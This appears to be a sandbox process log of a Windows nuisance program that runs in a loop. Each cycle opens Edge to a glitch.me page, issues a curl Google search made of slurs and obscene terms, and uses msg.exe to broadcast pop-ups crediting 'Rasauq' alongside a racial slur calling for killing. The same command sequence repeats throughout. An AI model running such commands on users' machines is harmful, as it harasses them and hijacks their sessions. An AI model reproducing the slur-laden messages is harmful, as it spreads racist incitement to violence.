C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9532,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9516 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9880,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=10100,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10068 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5652,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10252 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10476,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10436 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10608,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10592,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10568,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10788 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10784,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10864 /prefetch:8

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10448,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10952 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9896,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11144 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10996,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11348 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5708,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5720 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11624,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11156 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11908,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11952 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12116,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12144 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=10860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12152 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12272,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12148 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12312,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12344 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=12572,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=12524,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12684 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=12540,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12868 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=6208,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8240,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13116 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=5728,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=12984 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=13304,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13332 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=13484,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=13520 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=112115826672576 --process=264 /prefetch:7 --thread=5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

